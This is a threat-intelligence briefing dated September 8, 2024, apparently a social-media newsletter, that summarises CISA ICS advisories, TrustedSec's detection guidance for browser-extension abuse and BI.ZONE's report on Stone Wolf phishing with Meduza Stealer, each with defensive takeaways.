CISA Warns of ICS Vulnerabilities, Browser Extension Exploits, and Stone Wolf's Meduza Stealer Attack - Intel Briefing September 8, 2024
Welcome to the Daily Threat Briefing for September 8, 2024. Today's briefing explores three stories: CISA releases an ICS advisory with four new vulnerabilities exploited in the wild, a TrustedSec report on browser-based attacks and defences, and reports on Meduza stealers in the latest campaigns targeting Russian organizations.
Executive Summary
1???CISA Releases New ICS Vulnerabilities
???Actionable Takeaway: Organizations should prioritize patching and securing ICS systems, conducting thorough vulnerability assessments to safeguard critical infrastructures against potential exploitation.
2???Browser Extension Exploits on the Rise
???Actionable Takeaway: Organizations must audit browser extensions, apply strict security policies, and leverage monitoring tools to identify potential misuse or installation of malicious extensions. Training end users to report system anomalies can help build a security culture and your human sensors.
3???Meduza Stealer Targets Russian Organizations
???Actionable Takeaway: Implement proactive phishing awareness training and security measures to detect and prevent malware like Meduza Stealer. Monitoring underground forums for malware offerings can help organizations stay ahead of emerging threats.
CISA Releases Four Industrial Control Systems Advisories
On September 5, 2024, CISA released a technical report on multiple Industrial Control Systems (ICS) vulnerabilities. The report highlights critical weaknesses in Hughes Network Systems, Baxter, and Mitsubishi Electric products, underscoring the risks to critical infrastructure.
- Hughes Network Systems WL3000 Fusion Software: Vulnerabilities related to unencrypted credentials and lack of encryption for sensitive data.CVE-2024-39278: Insufficiently protected credentials, CVSS score 5.1.CVE-2024-42495: Missing encryption of sensitive data, CVSS score 7.1.
- Baxter Connex Health Portal: SQL Injection and improper access control vulnerabilities could lead to malicious code injection or unauthorized data access.CVE-2024-6795: SQL Injection, CVSS score 10.0.CVE-2024-6796: Improper access control, CVSS score 8.2.
- Mitsubishi Electric MELSEC iQ-R, Q, and L Series (Update E): A denial-of-service vulnerability affects Ethernet communication.CVE-2020-5652: Denial of service through uncontrolled resource consumption, CVSS score 7.5.
- Mitsubishi Electric MELSEC iQ-R, iQ-L Series, and MELIPC Series (Update E): Denial of service due to improper resource shutdown.CVE-2022-33324: Improper resource shutdown or release, CVSS score 7.5.
Insights and Analysis
The Baxter Connex Health Portal vulnerability, especially the SQL injection, stands out as an example of how poor input validation can expose critical systems to malicious actors.
- Human error and oversight in securing sensitive systems, such as improper input sanitization, often cause significant breaches.
- Secure coding practices, such as encrypted data storage and proper access control, remain essential for avoiding vulnerabilities like those seen in Hughes and Baxter systems.
- Denial-of-service vulnerabilities like those in Mitsubishi Electric systems highlight the importance of rigorous stress testing and patch management in critical environments.
- This highly technical report does not provide Indicators of Compromise (IoCs).
Browser Extension Exploits: Detection and Mitigation Strategies
On September 03, 2024, TrustedSec researchers released a technical report on browser extension exploitation and detection strategies. The report outlines practical steps to mitigate threats from malicious or abused browser extensions, providing useful insights for organizations focused on web-based threats.
- The report focuses on detecting browser extension misuse across major browsers, such as Chrome, Firefox, Edge, and Brave.
- Emphasizes the importance of enabling registry auditing, specifically monitoring Windows Event ID 4657 for detecting extension installations.
- This article demonstrates the use of Splunk queries to detect browser extension installations and modifications, with a practical example using the LastPass extension.
- Describes the significance of monitoring sensitive data extraction attempts using Event ID 4663 and process creation with Event ID 4688.
- References alternative detection methods developed by other researchers for expanding detection capabilities.
领英推è
Insights and Analysis
Browser extension abuse continues to be a serious cybersecurity risk due to the sheer number of extensions and the sensitive data stored within browsers.
- Human error, such as allowing unapproved browser extensions, can lead to major security gaps. Implementing strict access controls around extensions is a crucial defence.
- The difficulty of normalizing extension identifiers across different browsers underscores the need for security-conscious coding practices, especially for web applications that integrate with browsers.
- Splunk's tagging feature is a powerful tool for security teams, helping streamline detection and improve alerting.
- This report is technical and includes indicators of compromise (IoCs).
Stone Wolf employs Meduza Stealer to hack Russian companies.
On September 3, 2024, BI.ZONE released a technical report on a phishing campaign leveraging the Meduza Stealer malware to target Russian organizations. The attackers, identified as Stone Wolf, used phishing emails disguised as legitimate communication from industrial automation providers to distribute malicious payloads.
- The phishing emails contained an archive with a .p7s digital signature, a legitimate document as a decoy, and a malicious URL.
- The campaign utilized a PowerShell command to download and execute the Meduza Stealer payload from a remote SMB server.
- Meduza Stealer, available on underground forums, was used to steal credentials from browsers, password managers, and crypto-wallets.
- Essential MITRE ATT&CK techniques include command and scripting interpreter (PowerShell) and system binary proxy execution (MSHTA).
Insights and Analysis
Using legitimate brands in phishing campaigns emphasizes the role of human trust in cybersecurity breaches.
- Employees need continuous training to recognize phishing techniques, as attackers often use trusted brands to manipulate victims.
- Secure code practices are essential in preventing the misuse of system binaries like MSHTA, which was exploited in this attack.
- Monitoring underground forums for malware-as-a-service offerings, like Meduza Stealer, can help organizations avoid new threats.
- This report is technical and includes indicators of compromise (IoCs).
Purpose and Disclaimer.
Welcome to Daily Threat Insights and Analysis, where I present three key stories that captured my attention as a threat intelligence professional. Please note that these reports are not affiliated with any organization, and my insights should be considered opinions or a starting point for navigating the vast sea of public reporting. Before taking action, conduct a thorough impact analysis specific to your business needs. Follow me for more content and stay ahead in the ever-evolving world of threat intelligence.
References:
Story 1:
Story2:
Story 3: